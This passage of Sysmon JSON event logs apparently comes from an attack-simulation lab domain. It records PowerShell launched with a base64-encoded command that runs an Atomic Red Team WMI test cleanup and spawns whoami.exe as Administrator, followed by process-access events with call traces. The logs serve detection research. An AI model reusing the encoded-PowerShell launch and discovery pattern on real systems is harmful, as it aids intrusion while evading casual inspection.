WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.707","ProcessGuid":"{41C8662E-20D8-5F25-0000-00104C230900}","Image":"C:\\Windows\\System32\\whoami.exe","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"whoami - displays logged on user information","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"whoami.exe","CommandLine":"\"C:\\Windows\\system32\\whoami.exe\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20D7-5F25-0000-0020ADE10800}","LogonId":"0x8e1ad","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=AA1E17EA3DB5CD9D8BC061CAEC74C6E8,SHA256=8ECFFCCE38D4EE87ABAEE6CBE843D94D4F8FB98FAB3C356C7F6B70E60B10F88A,IMPHASH=E24E330FA9663CE77F2031CACAEB3DF9","ParentProcessGuid":"{41C8662E-20D8-5F25-0000-001089080900}","ParentProcessId":"1052","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBDAGwAZQBhAG4AdQBwAA==","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5662,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.706\r\nSourceProcessGUID: {41C8662E-20D8-5F25-0000-001089080900}\r\nSourceProcessId: 1052\r\nSourceThreadId: 4312\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-00104C230900}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|UNKNOWN(00007FFD675C2F4B)|UNKNOWN(00007FFD66A64025)|UNKNOWN(00007FFD66A63CF6)|UNKNOWN(00007FFD6751510B)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A64709)|UNKNOWN(00007FFD66A642A5)|UNKNOWN(00007FFD66A64025)|UNKNOWN(00007FFD66A63CF6)|UNKNOWN(00007FFD6751510B)|UNKNOWN(00007FFD66A2488C)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.706","SourceProcessGUID":"{41C8662E-20D8-5F25-0000-001089080900}","SourceProcessId":"1052","SourceThreadId":"4312","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-00104C230900}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|UNKNOWN(00007FFD675C2F4B)|UNKNOWN(00007FFD66A64025)|UNKNOWN(00007FFD66A63CF6)|UNKNOWN(00007FFD6751510B)|UNKNOWN(00007FFD66A2488C)|UNKNOWN(00007FFD66A82D5B)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A663C0)|UNKNOWN(00007FFD66A66251)|UNKNOWN(00007FFD66A581D6)|UNKNOWN(00007FFD66A64709)|UNKNOWN(00007FFD66A642A5)|UNKNOWN(00007FFD66A64025)|UNKNOWN(00007FFD66A63CF6)|UNKNOWN(00007FFD6751510B)|UNKNOWN(00007FFD66A2488C)","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5663,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.706\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 772\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20D8-5F25-0000-00104C230900}\r\nTargetProcessId: 3488\r\nTargetImage: C:\\Windows\\system32\\whoami.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.706","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"772","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20D8-5F25-0000-00104C230900}","TargetProcessId":"3488","TargetImage":"C:\\Windows\\system32\\whoami.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5664,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.706\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.706","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5665,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.706\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.706","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5666,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.706\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.706","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5667,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.706\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.706","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5668,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.706\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:20.706","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"732","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:20","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5669,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:20.706\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 732\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: 